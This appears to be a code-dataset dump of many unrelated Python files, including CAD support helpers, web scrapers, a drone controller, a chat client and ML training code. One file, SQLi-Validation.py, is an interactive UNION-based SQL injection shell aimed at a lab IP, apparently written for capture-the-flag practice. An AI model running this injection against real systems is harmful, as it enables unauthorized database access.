spring.name = name\n if elevation is not None:\n spring.elevation = elevation\n if kFr is not None:\n spring.kFr = kFr\n if kFs is not None:\n spring.kFs = kFs\n if kFz is not None:\n spring.kFz = kFz\n if kMr is not None:\n spring.kMr = kMr\n if kMs is not None:\n spring.kMs = kMs\n if angle is not None:\n spring.angle = angle\n\n\ndef add_line_support(model: Model, line_segments: list[LineSegment2D], name: Union[str, None],\n elevation: Union[float, None],\n Fr: Union[bool, None], Fs: Union[bool, None], Fz: Union[bool, None],\n Mr: Union[bool, None], Ms: Union[bool, None]):\n # cad layer\n structure_layer: StructureLayer = model.cad_manager.structure_layer\n # add line segments support\n for segment in line_segments:\n line_support = structure_layer.add_line_support(segment)\n # set properties of point support\n if name is not None:\n line_support.name = name\n if elevation is not None:\n line_support.elevation = elevation\n if Fr is not None:\n line_support.Fr = Fr\n if Fs is not None:\n line_support.Fs = Fs\n if Fz is not None:\n line_support.Fz = Fz\n if Mr is not None:\n line_support.Mr = Mr\n if Ms is not None:\n line_support.Ms = Ms\n\n\ndef add_line_spring(model: Model, line_segments: list[LineSegment2D], name: Union[str, None],\n elevation: Union[float, None],\n kFr0: Union[float, None], kFs0: Union[float, None], kFz0: Union[float, None],\n kMr0: Union[float, None], kMs0: Union[float, None],\n kFr1: Union[float, None], kFs1: Union[float, None], kFz1: Union[float, None],\n kMr1: Union[float, None], kMs1: Union[float, None],\n angle: Union[float, None]):\n # cad layer\n structure_layer: StructureLayer = model.cad_manager.structure_layer\n # add line segments spring\n for segment in line_segments:\n line_spring = structure_layer.add_line_spring(segment)\n # set properties of point support\n if name is not None:\n line_spring.name = name\n if elevation is not None:\n line_spring.elevation = elevation\n if angle is not None:\n line_spring.angle = angle\n # start point stiffness values\n if kFr0 is not None:\n line_spring.kFr0 = kFr0\n if kFs0 is not None:\n line_spring.kFs0 = kFs0\n if kFz0 is not None:\n line_spring.kFz0 = kFz0\n if kMr0 is not None:\n line_spring.kMr0 = kMr0\n if kMs0 is not None:\n line_spring.kMs0 = kMs0\n # end point stiffness values\n if kFr1 is not None:\n line_spring.kFr1 = kFr1\n if kFs1 is not None:\n line_spring.kFs1 = kFs1\n if kFz1 is not None:\n line_spring.kFz1 = kFz1\n if kMr1 is not None:\n line_spring.kMr1 = kMr1\n if kMs1 is not None:\n line_spring.kMs1 = kMs1\n\n\ndef add_area_spring(model: Model, polygon: Polygon2D, name: Union[str, None], elevation: Union[float, None],\n kFr0: Union[float, None], kFs0: Union[float, None], kFz0: Union[float, None],\n kMr0: Union[float, None], kMs0: Union[float, None],\n kFr1: Union[float, None], kFs1: Union[float, None], kFz1: Union[float, None],\n kMr1: Union[float, None], kMs1: Union[float, None],\n kFr2: Union[float, None], kFs2: Union[float, None], kFz2: Union[float, None],\n kMr2: Union[float, None], kMs2: Union[float, None],\n angle: Union[float, None]):\n # cad layer\n structure_layer: StructureLayer = model.cad_manager.structure_layer\n # add area spring\n area_spring = structure_layer.add_area_spring(polygon)\n # set properties of area spring\n if name is not None:\n area_spring.name = name\n if elevation is not None:\n area_spring.elevation = elevation\n if angle is not None:\n area_spring.angle = angle\n # point 1 stiffness values\n if kFr0 is not None:\n area_spring.kFr0 = kFr0\n if kFs0 is not None:\n area_spring.kFs0 = kFs0\n if kFz0 is not None:\n area_spring.kFz0 = kFz0\n if kMr0 is not None:\n area_spring.kMr0 = kMr0\n if kMs0 is not None:\n area_spring.kMs0 = kMs0\n # point 2 stiffness values\n if kFr1 is not None:\n area_spring.kFr1 = kFr1\n if kFs1 is not None:\n area_spring.kFs1 = kFs1\n if kFz1 is not None:\n area_spring.kFz1 = kFz1\n if kMr1 is not None:\n area_spring.kMr1 = kMr1\n if kMs1 is not None:\n area_spring.kMs1 = kMs1\n # point 3 stiffness values\n if kFr2 is not None:\n area_spring.kFr2 = kFr2\n if kFs2 is not None:\n area_spring.kFs2 = kFs2\n if kFz2 is not None:\n area_spring.kFz2 = kFz2\n if kMr2 is not None:\n area_spring.kMr2 = kMr2\n if kMs2 is not None:\n area_spring.kMs2 = kMs2\n","repo_name":"mitchell-tesch/ghConcept","sub_path":"gh_concept/concept/add_structure.py","file_name":"add_structure.py","file_ext":"py","file_size_in_byte":12369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32996896495","text":"import datetime\nfrom requests_html import HTMLSession\nfrom peewee import DoesNotExist\nfrom db2 import Keyword, Page, Category, PageKeywords\n\n\nmy_keys = [\n 'buy laptop',\n 'buy xiaomi',\n 'buy iphone',\n # 'buy samsung'\n]\n\n\ndef google_craper(keyword, category_id, lang='en', serp_count=10):\n\n try:\n\n db_key = Keyword.get(name=keyword)\n db_key.updated = datetime.datetime.now()\n db_key.save()\n\n except DoesNotExist:\n db_key = Keyword.create(\n name=keyword,\n updated=datetime.datetime.now(),\n category_id=category_id\n )\n\n session = HTMLSession()\n\n resp = session.get(\n f'https://www.google.com/search?q={db_key.name}&num={serp_count}&hl={lang}')\n\n snipets = resp.html.xpath('//div[@class=\"g\"]')\n\n db_pages = []\n\n for sn in snipets:\n title = sn.xpath('//h3')[0].text\n description = sn.xpath('//span[@class=\"st\"]')[0].text\n url = sn.xpath('//div[@class=\"r\"]/a[1]/@href')[0]\n\n data = {\n 'title': title,\n 'description': description,\n 'url': url\n }\n\n db_pages.append(data)\n\n # try:\n #\n # page_id = Page.create(**data)\n # db_key.pages.add(Page.get(Page.id == page_id))\n # print(page_id, url)\n #\n # except Exception as e:\n # print(e, type(e), url)\n\n Page.insert_many(db_pages).execute()\n\n\ndef main():\n try:\n category = Category.get(name='ecommerce')\n\n except DoesNotExist:\n category = Category.create(\n name='ecommerce',\n description='ecommerce category'\n )\n\n PageKeywords.delete().execute()\n Page.delete().execute()\n\n for key in my_keys:\n google_craper(key, category)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"vertinskiy-oleg/python-for-seo","sub_path":"code from lessons/23_less_sql_orm_peewee/gcrawler.py","file_name":"gcrawler.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6380247552","text":"import scrapy\nfrom selenium import webdriver\nfrom wangyiPro.items import WangyiproItem\n\n\nclass WangyiSpider(scrapy.Spider):\n name = 'wangyi'\n # allowed_domains = ['www.com']\n start_urls = ['https://news.163.com/']\n model_urls = [] # 存储五大板块所对应的url\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.bro = webdriver.Edge()\n\n # 解析板块详情页新闻标题和对应的详情页url\n def parse_model(self, response):\n div_list = response.xpath('//div[@class=\"ndi_main\"]/div')\n for div in div_list:\n if div.xpath('.//span[@class=\"tg_tag\"]/text()').extract_first() == '广告':\n continue\n title = div.xpath('./div[@class=\"news_title\"]/h3/a/text() | .//div[@class=\"news_title\"]/h3/a/text()').extract_first()\n new_detail_url = div.xpath('./div[@class=\"news_title\"]/h3/a/@href | .//div[@class=\"news_title\"]/h3/a/@href').extract_first()\n print(title)\n print(new_detail_url)\n item = WangyiproItem()\n item[\"title\"] = title\n # 对新闻详情页发起请求\n yield scrapy.Request(url=new_detail_url, callback=self.parse_detail, meta={\"item\": item})\n\n # 解析新闻内容\n def parse_detail(self, response):\n content = ''.join(response.xpath('//*[@id=\"content\"]/div[2]//text() |'\n ' //div[@class=\"viewport\"]//p/text()').extract())\n item = response.meta[\"item\"]\n item[\"content\"] = content\n yield item\n\n # 解析五大板块对应详情页的url\n def parse(self, response):\n li_list = response.xpath('//*[@id=\"index2016_wrap\"]/div[1]/div[2]/div[2]/div[2]/div[2]/div/ul/li')\n alist = [3, 4, 6, 7, 8]\n for index in alist:\n model_url = li_list[index].xpath('./a/@href').extract_first()\n self.model_urls.append(model_url)\n\n # 依次对板块的url发起请求\n for url in self.model_urls:\n print(url)\n yield scrapy.Request(url=url, callback=self.parse_model)\n\n def closed(self, spider):\n self.bro.quit()\n\n","repo_name":"MrBin226/code","sub_path":"scrapy框架/wangyiPro/wangyiPro/spiders/wangyi.py","file_name":"wangyi.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"71324516882","text":"import argparse\nimport cv2\n\nfrom telloControl import telloControl\nfrom telloCamera import telloCamera\n\n# Gestion de argumentos\ndef buildArgParser():\n # Instancia para los argumentos\n parser = argparse.ArgumentParser()\n # Añade los argumentos permitidos\n parser.add_argument(\"-m\", default='k', nargs='?', choices=['k', 'c', 's', 'obj', 'p', 'face', 'r', 'pan', 'mf'],\n help=\"Enable keyboard control (k) / command control (c) / search color (s)\\n \\\n /object track (obj) /path search (p) /face track (face)\\n \\\n /hand number recognition (r) /panorama (pan) /multiface(mf)\")\n parser.add_argument(\"-t\", action='store_true', help=\"Enable test mode: no command sent\")\n parser.add_argument(\"-l\", action='store_true', help=\"Enable laptop camera\")\n parser.add_argument(\"-s\", default='36', help=\"For panorama search, number of steps\")\n parser.add_argument(\"-cm\", default=0.10, help=\"Margin for centering target on panorama\")\n args = parser.parse_args()\n\n return args.m, args.t, args.l, args.s, args.cm\n\ndef main():\n mode, test, laptop, steps, center_margin = buildArgParser()\n print(\"laptop:\", laptop)\n\n # Connect and start fly\n if not test:\n print(\"Working on real mode\")\n else:\n print(\"Working on test mode\")\n # Handle drone through chosen interface\n if mode == 'k':\n tCtrl = telloControl(test)\n print(\"Starting Tello control with keyboard...\")\n tCtrl.keyControl()\n elif mode == 'c':\n tCtrl = telloControl(test)\n print(\"Starting Tello control with command...\")\n tCtrl.commandControl()\n elif mode == 's':\n tCamera = telloCamera(test, trackfunction=\"Object\", useDroneCamera=not laptop)\n tCamera.calibrate()\n elif mode == 'p':\n try:\n tCamera = telloCamera(test, useDroneCamera=not laptop)\n tCamera.startVideoLoopSearchShapes()\n except ValueError:\n pass\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n elif mode == 'obj':\n print(\"Following object...\")\n tCamera = telloCamera(test, \"Object\", not laptop)\n tCamera.startVideoLoopTarget()\n elif mode == 'face':\n print(\"Following face...\")\n tCamera = telloCamera(test, \"Face\", not laptop)\n tCamera.startVideoLoopTarget()\n elif mode == 'r':\n print(\"Recognizing hand numbers...\")\n tCamera = telloCamera(test, useDroneCamera=not laptop)\n tCamera.startVideoLoopSearchHand()\n elif mode == 'pan':\n print(\"Face count on panorama\")\n tCamera = telloCamera(test, useDroneCamera=not laptop)\n tCamera.startVideoLoopPanorama(steps=int(steps), center_margin=float(center_margin))\n elif mode == 'mf':\n print(\"Multiface count with repetition detection\")\n tCamera = telloCamera(test, useDroneCamera=not laptop)\n tCamera.startVideoLoopMultiFace()\n\nif __name__ == '__main__':\n exit(main())\n\n","repo_name":"jadepedro/Tello-Computer-Vision","sub_path":"TKC.py","file_name":"TKC.py","file_ext":"py","file_size_in_byte":2982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43373224479","text":"n = int(input())\narr = list(map(int,input().split()))\n\n# 3으로 나누거나 2를 곱하므로 중복 불가\ndef calc(num, cnt, arr, result):\n num2 = num * 2\n num3 = num // 3\n r = num % 3\n \n if cnt == len(arr):\n return result\n \n if num2 in arr:\n result.append(num2)\n return calc(num2, cnt + 1, arr, result)\n \n elif r == 0 and num3 in arr:\n result.append(num3)\n return calc(num3, cnt + 1, arr, result)\n \n else:\n result = []\n cnt = 0\n return result\n \ndef print_list(List):\n for i in range(len(List)):\n print(List[i], end = ' ')\n\nfor num in arr:\n result = [num]\n result = calc(num, 1, arr, result)\n \n if len(result) == len(arr):\n print_list(result)\n break","repo_name":"hobin-jang/baekjoon","sub_path":"python/16936.py","file_name":"16936.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"37858753981","text":"#!/usr/bin/env python\n\nimport logging\nimport sys\n\nfrom domain_event_broker import Subscriber, Retry\n\n\nlogging.basicConfig(level=logging.INFO)\n\n\ndef handler(event):\n delay = 5.0 + (10.0 * event.retries)\n raise Retry(delay)\n\n\nif __name__ == '__main__':\n binding_keys = sys.argv[1:]\n subscriber = Subscriber()\n subscriber.register(handler, name='retry-ronny', binding_keys=binding_keys, max_retries=3)\n subscriber.start_consuming()\n","repo_name":"AbletonAG/domain-event-broker","sub_path":"examples/retry_after_delay.py","file_name":"retry_after_delay.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"} +{"seq_id":"10257156179","text":"#!/usr/bin/env python3\n\nimport random\nimport requests\nfrom bs4 import BeautifulSoup\nfrom cmd import Cmd\n\n\nclass Term(Cmd):\n\n prompt = \"> \"\n\n def default(self, args):\n name = f'mard-{random.randrange(1000000,9999999)}'\n resp = requests.post('http://10.10.11.116/',\n headers={\"Content-Type\": \"application/x-www-form-urlencoded\"},\n data={\"username\": name, \"country\": f\"' union {args};-- -\"})\n soup = BeautifulSoup(resp.text, 'html.parser')\n if soup.li:\n print('\\n'.join([x.text for x in soup.findAll('li')]))\n\n def do_quit(self, args):\n return 1\n\nterm = Term()\nterm.cmdloop()\n","repo_name":"Mardcore7/Python3","sub_path":"SQLi-Validation.py","file_name":"SQLi-Validation.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31422853754","text":"import socket\nimport threading\nfrom kivy.app import App\nfrom kivy.lang import Builder\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.properties import StringProperty\nfrom kivy.uix.button import Button\nfrom kivy.uix.textinput import TextInput\nfrom kivy.clock import mainthread\n\n\nKV = \"\"\"\nMyBl:\n\torientation: \"vertical\"\n\t\n\tLabel:\n\t\tfont_size: \"18sp\"\n\t\tmiltiline: True\n\t\ttext_size: self.width*0.98, self.height\n\t\tvalign: 'top'\n\t\tsize_hint_x: 1.0\n\t\tsize_hint_y: 0.7\n\t\theight: self.texture_size[1] + 15\n\t\ttext: root.data_label\n\t\t\n\tTextInput:\n\t\tid: Inp\n\t\tmiltiline: False\n\t\tpadding_y: (5,5)\n\t\tsize_hint: (1, 0.2)\n\t\ton_text: app.process()\n\t\n\tButton:\n\t\ttext: \"Send message\"\n\t\t\n\t\tbold: True\n\t\tbackground_color:'#70FF00'\n\t\tsize_hint: (1,0.1)\n\t\ton_press: root.callback()\n\"\"\"\n\nclass MyBl(BoxLayout):\n\tdata_label = StringProperty(\"Welcome!\\n\")\n\t\n\tdef __init__(self, **kwargs):\n\t\tsuper().__init__(**kwargs)\n\t\tSERVER = \"146.19.247.186\"\n\t\tPORT = 3000\n\t\tself.client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\t\tself.client.connect((SERVER, PORT))\n\t\tself.client.send('__join'.encode('ascii'))\n\t\tthreading.Thread(target=self.get_data).start()\n\t\n\tdef callback(self):\n\t\tmsg = self.ids.Inp.text\n\t\tself.set_data_label(\"You: \" + msg)\n\t\tself.client.send(msg.encode('ascii'))\n\t\t\n\tdef get_data(self):\n\t\tUDP_MAX_SIZE = 65535\n\t\twhile App.get_running_app().running:\n\t\t\tin_data = self.client.recv(UDP_MAX_SIZE)\n\t\t\tkkk = in_data.decode('ascii')\n\t\t\tself.set_data_label(kkk)\n\t\t\t\n\t@mainthread\n\tdef set_data_label(self, data):\n\t\tself.data_label += str(data) + \"\\n\"\t\t\t\n\t\nclass MyApp(App):\n\trunning = True\n\t\n\tdef process(self):\n\t\ttext = self.root.ids.Inp.text\n\t\n\tdef build(self):\n\t\treturn Builder.load_string(KV)\n\t\t\n\tdef on_stop(self):\n\t\tself.running = False\n\t\t\nMyApp().run()\n","repo_name":"AntonioWanderer/Chat-for-vps","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42812972716","text":"from fastapi import APIRouter\nfrom src.models import GreatestCommonDivisor\n\nrouter = APIRouter(\n prefix='/gcd',\n tags=['gcd']\n)\n\n@router.get(\"/\")\ndef gcd(x: int, n: int):\n result = __gcd(x, n)\n return GreatestCommonDivisor.GCD(gcd = result)\n\ndef __gcd(x: int, n: int):\n if x < n:\n x, n = n, x\n\n if n == 0:\n return x\n else:\n return __gcd(n, x % n)","repo_name":"hjnewman3/CryptoTools","sub_path":"src/routers/GreatestCommonDivisorRouter.py","file_name":"GreatestCommonDivisorRouter.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37947763482","text":"import shutil\nfrom pathlib import Path\n\n\ndef add_logger() -> None:\n current_path = Path(Path.cwd().parent) / \"services\" / \"logger.py\"\n install_path = Path.cwd() / \"page_rendering-0.1.0\" / \"page_rendering\"\n source_path = Path.cwd() / \"page_rendering\"\n shutil.copy(str(current_path), str(source_path))\n shutil.copy(str(current_path), str(install_path))\n\n\ndef get_setup() -> None:\n current_path = Path.cwd() / \"page_rendering-0.1.0\" / \"setup.py\"\n source_path = Path.cwd()\n shutil.move(str(current_path), str(source_path))\n","repo_name":"epam/badgerdoc","sub_path":"common/page_rendering/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"3"} +{"seq_id":"11819505489","text":"import pandas as pd\nfrom sklearn.metrics import confusion_matrix, classification_report\nfrom wittgenstein import RIPPER\n\n\ndef rule_induction(x_train, y_train, x_test, y_test):\n final_results = dict()\n\n df_train = pd.DataFrame(x_train)\n df_train['churn'] = pd.Series(y_train)\n\n x_test = pd.DataFrame(x_test)\n y_test = pd.DataFrame(y_test)\n\n model = RIPPER(verbosity=1)\n model.fit(df_train, class_feat=\"churn\")\n y_prediction = model.predict(x_test)\n cm = confusion_matrix(y_test, y_prediction)\n cr = classification_report(y_test, y_prediction, output_dict=True)\n\n final_results['model'] = model\n final_results['acc'] = (cm[0][0] + cm[1][1]) / (cm[0][0] + cm[1][0] + cm[0][1] + cm[1][1])\n final_results['cm'] = cm\n final_results['cr'] = cr\n\n print(final_results['acc'])\n\n return final_results\n","repo_name":"ggsdc/classification-exercise","sub_path":"src/functions/rule_induction.py","file_name":"rule_induction.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7724690726","text":"import urllib.request\nfrom bs4 import BeautifulSoup\ndef get_html(url):\n web=urllib.request.urlopen(url)\n soup=BeautifulSoup(web,\"html.parser\")\n data=soup.find(\"div\",id=\"wrapper\")\n return data\ndef get_all(data):\n data=data.find_all(\"table\")\n for link in data:\n name=link.find(\"div\",class_=\"pl2\").find(\"a\").get_text().replace(' ','').replace('\\n','')\n author=link.find(\"p\",class_=\"pl\").get_text().split('/')[0].replace(' ','')\n score=link.find(\"span\",class_=\"rating_nums\").get_text().replace(' ','')\n peoplenum=link.find(\"span\",class_=\"pl\").get_text().replace(' ','').replace('(','').replace(')','').replace('\\n','')\n try:\n remark=link.find(\"p\",class_=\"quote\").get_text().replace(' ','').replace('\\n','')\n except:\n remark='暂无评价'\n with open('/home/wei/桌面/book.txt','a+', encoding='UTF-8') as f:\n f.write(name+' '+author+' '+score+' '+peoplenum+' '+remark+'\\r\\n')\nif __name__ == '__main__':\n url='https://book.douban.com/top250?start='\n with open('/home/wei/桌面/book.txt','a+', encoding='UTF-8') as f:\n f.write('书籍名称 '+'作者 '+'评分 '+'评价人数 '+'评论 '+'\\r\\n')\n for i in range(10):\n url1=url+str(i*25)\n get_all(get_html(url1))","repo_name":"wym879/crawler","sub_path":"douban_book.py","file_name":"douban_book.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70214298641","text":"from __future__ import print_function\n\nimport datetime\nimport os.path\nimport shift_reader\nimport argparse\n\nfrom google.auth.transport.requests import Request\nfrom google.oauth2.credentials import Credentials\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom googleapiclient.discovery import build\nfrom googleapiclient.errors import HttpError\nfrom progress.bar import ChargingBar\n\n# If modifying these scopes, delete the file token.json.\nSCOPES = ['https://www.googleapis.com/auth/calendar','https://www.googleapis.com/auth/calendar.events']\n\ndef get_calendar(gc_service, calendar_name):\n list_result = gc_service.calendarList().list().execute()\n calendars = list_result.get('items', [])\n out_calendar = None\n for calendar in calendars:\n if calendar['summary'] == calendar_name:\n out_calendar = calendar\n return out_calendar\n\ndef fetch_events(gc_service, calendar, timeMin, timeMax):\n events_result = gc_service.events().list(\n calendarId=calendar['id'],\n timeMin=timeMin.isoformat(),\n timeMax=timeMax.isoformat(),\n singleEvents=True,\n orderBy='startTime').execute()\n events = events_result.get('items', [])\n return events\n\ndef delete_events(gc_service, calendar, events):\n bar = ChargingBar('Deleting', max=len(events))\n for e in events:\n gc_service.events().delete(calendarId=calendar['id'], eventId=e['id'], sendUpdates='none').execute()\n bar.next()\n bar.finish()\n print(\"All events removed\")\n\ndef get_involved_time_range(availability):\n min_start_datetime = None\n max_end_datetime = None\n for item in availability:\n min_start_datetime = item['start'] if min_start_datetime is None or min_start_datetime > item['start'] else min_start_datetime\n max_end_datetime = item['end'] if max_end_datetime is None or max_end_datetime < item['end'] else min_start_datetime\n return min_start_datetime, max_end_datetime\n\ndef load_availability(gc_service, calendar, availability):\n bar = ChargingBar('Saving', max=len(availability))\n for a in availability:\n gc_service.events().insert(\n calendarId=calendar['id'],\n sendNotifications='none',\n body={\n 'summary': a['name'],\n 'start': {\n 'dateTime': a['start'].isoformat()\n },\n 'end': {\n 'dateTime': a['end'].isoformat()\n }\n }\n ).execute()\n bar.next()\n bar.finish()\n print(\"All {} events created\".format(len(availability)))\n\n\ndef main(args_namespace):\n \n CALENDAR_NAME = args_namespace.calendar\n AVAILABILITY_FILE = args_namespace.event_file\n \n creds = None\n # The file token.json stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists('token.json'):\n creds = Credentials.from_authorized_user_file('token.json', SCOPES)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file('credentials.json', SCOPES)\n creds = flow.run_local_server(port=0)\n # Save the credentials for the next run\n with open('token.json', 'w') as token:\n token.write(creds.to_json())\n\n try:\n service = build('calendar', 'v3', credentials=creds)\n\n # Search target calendar by name\n calendar = get_calendar(service, CALENDAR_NAME)\n if calendar is None:\n raise Exception(\"No calendar found with name {}\".format(CALENDAR_NAME))\n print(\"Target calendar: {} ({})\".format(calendar['summary'], calendar['id']))\n\n # Load availability from file\n availability_items = shift_reader.read_availability(AVAILABILITY_FILE)\n minTime, maxTime = get_involved_time_range(availability_items)\n print(\"Read {} items from file '{}'\".format(len(availability_items), AVAILABILITY_FILE))\n print(\"Time range: {} - {}\".format(minTime.isoformat(), maxTime.isoformat()))\n\n # Call API to fetch alredy saved events\n events = fetch_events(service, calendar, minTime, maxTime)\n\n if not events:\n print('No availability found in this time range')\n else:\n print('Found {} items already saved in calendar'.format(len(events)))\n # Prints the start and name of the next 10 events\n for event in events:\n start = event['start'].get('dateTime', event['start'].get('date'))\n end = event['end'].get('dateTime', event['end'].get('date'))\n print(\"{} - {}: {}\".format(start, end, event['summary'] if 'summary' in event else 'No Title'))\n remove = None\n while remove is None:\n print(\"All those items will be removed. Continue? (y/N): \", end='')\n in_str = input().strip()\n if len(in_str) == 0 or in_str.lower() == 'n':\n remove = False\n elif in_str.lower() == 'y':\n remove = True\n else:\n print(\"No valid value. Please put only 'y' or 'n'.\")\n if remove:\n delete_events(service, calendar, events)\n\n load_availability(service, calendar, availability_items)\n\n except HttpError as error:\n print('An error occurred: %s' % error)\n\nparser = argparse.ArgumentParser(description='Load availability in google calendar.')\nparser.add_argument('-c', '--calendar', metavar='CALENDAR_NAME', help='the name of calendar where you want to upload events.', action='store', required=False, default='Reperibilità')\nparser.add_argument('event_file', metavar='EVENT_FILE', help='the CSV file coniainig event to upload.')\n\nif __name__ == '__main__':\n main(parser.parse_args())","repo_name":"mircobe87/availability-importer","sub_path":"availability-importer.py","file_name":"availability-importer.py","file_ext":"py","file_size_in_byte":6034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42485857875","text":"import os\nimport sys\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nimport kerastuner as kt\nimport subprocess\n\nfrom .descriptor import featurizer\n\nfrom . import TUNER_PROJECT_NAME, TUNER_MODEL_FOLDER, TFLITE_FILE, ONNX_FILE\n\n\nclass TunerRegressorTrainer(object):\n def __init__(self, X, y):\n self.X = X\n self.y = y\n self.input_shape = X.shape[1]\n self.output_shape = y.shape[1]\n self.cwd = os.getcwd()\n\n def _model_builder(self, hp):\n model = keras.Sequential()\n\n # Tune the number of units in the first Dense layer\n # Choose an optimal value between 32-512\n hp_units = hp.Int(\"units\", min_value=32, max_value=512, step=32)\n model.add(\n keras.layers.Dense(\n units=hp_units, activation=\"relu\", input_shape=(self.input_shape,)\n )\n )\n model.add(keras.layers.Dense(self.output_shape))\n\n # Tune the learning rate for the optimizer\n # Choose an optimal value from 0.01, 0.001, or 0.0001\n hp_learning_rate = hp.Choice(\"learning_rate\", values=[1e-2, 1e-3, 1e-4])\n\n model.compile(\n optimizer=keras.optimizers.Adam(learning_rate=hp_learning_rate),\n loss=\"mean_squared_error\",\n metrics=None,\n )\n\n return model\n\n def _search(self, X, y):\n self.tuner = kt.Hyperband(\n self._model_builder,\n objective=\"val_loss\",\n max_epochs=10,\n factor=3,\n directory=TUNER_PROJECT_NAME,\n project_name=\"trials\",\n )\n stop_early = tf.keras.callbacks.EarlyStopping(monitor=\"val_loss\", patience=5)\n self.tuner.search(\n X, y, epochs=50, validation_split=0.2, callbacks=[stop_early], verbose=True\n )\n self.best_hps = self.tuner.get_best_hyperparameters(num_trials=1)[0]\n\n def _get_best_epoch(self, X, y):\n # Build the model with the optimal hyperparameters and train it on the data for 50 epochs\n model = self.tuner.hypermodel.build(self.best_hps)\n history = model.fit(X, y, epochs=50, validation_split=0.2)\n\n val_per_epoch = history.history[\"val_loss\"]\n self.best_epoch = val_per_epoch.index(min(val_per_epoch)) + 1\n print(\"Best epoch: %d\" % (self.best_epoch,))\n\n def _final_train(self, X, y):\n self.hypermodel = self.tuner.hypermodel.build(self.best_hps)\n\n # Retrain the model\n self.hypermodel.fit(X, y, epochs=self.best_epoch, validation_split=0.2)\n\n def fit(self):\n self._search(self.X, self.y)\n self._get_best_epoch(self.X, self.y)\n self._final_train(self.X, self.y)\n self.hypermodel.save(os.path.join(TUNER_PROJECT_NAME, TUNER_MODEL_FOLDER))\n\n def export(self, output_dir):\n mdl = self.hypermodel\n print(\"Exporting model\")\n os.chdir(output_dir)\n input_model = mdl\n print(input_model.summary())\n print(\"Converting to TFLITE\")\n output_model = os.path.join(output_dir, TFLITE_FILE)\n converter = tf.lite.TFLiteConverter.from_keras_model(input_model)\n tflite_quant_model = converter.convert()\n with open(output_model, \"wb\") as o_:\n o_.write(tflite_quant_model)\n print(\"Converting to ONNX\")\n cmd = \"{0} -m tf2onnx.convert --opset 13 --tflite {1} --output {2}\".format(\n sys.executable, TFLITE_FILE, ONNX_FILE\n )\n print(cmd)\n subprocess.Popen(cmd, shell=True).wait()\n print(\"Conversions done!\")\n os.chdir(self.cwd)\n\n\ndef train_model(smiles, y):\n X = featurizer(smiles)\n y = np.array(y).reshape(-1, 1)\n mdl = TunerRegressorTrainer(X, y)\n mdl.fit()\n mdl.export(\".\")\n\n","repo_name":"ersilia-os/keras-tuner-chem","sub_path":"src/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":3733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23530624928","text":"from lib2to3.pgen2.token import OP\r\nfrom get_distribution_type import get_best_distribution\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom scipy.stats import norm\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns \r\nsns.set_theme(color_codes=True, style=\"whitegrid\")\r\n\r\n\r\n\r\ndef cost_from_tol_hard_approach(x0):\r\n\r\n try:\r\n \r\n # load in HRI columns\r\n # df = pd.read_csv(\"data/prep/max_filtered_hri_meta_eol.csv\")\r\n df = pd.read_csv(\"data/prep/max_filtered_final.csv\").iloc[:, 2:] \r\n # print(df.columns)\r\n\r\n \r\n except Exception as e:\r\n print(f\"Exception: {e} \\n\\n can NOT real in file '../data/final/having_a_look_without_nan.csv'\")\r\n\r\n\r\n df_above = df[(df[df.columns[0]] > x0[0]) | \\\r\n (df[df.columns[1]] > x0[1]) | \\\r\n (df[df.columns[2]] > x0[2]) | \\\r\n (df[df.columns[3]] > x0[3]) | \\\r\n (df[df.columns[4]] > x0[4]) | \\\r\n (df[df.columns[5]] > x0[5]) | \\\r\n (df[df.columns[6]] > x0[6]) | \\\r\n (df[df.columns[7]] > x0[7]) | \\\r\n (df[df.columns[8]] > x0[8]) | \\\r\n (df[df.columns[9]] > x0[9])]\r\n \r\n \r\n\r\n \r\n def visualisierung_für_validierung(x0, df_komplett, df_toleranz_gerissen):\r\n \r\n i,j=0,0\r\n PLOTS_PER_ROW = 5\r\n PLOTS_PER_COL = 2\r\n\r\n fig, axs = plt.subplots(PLOTS_PER_COL, 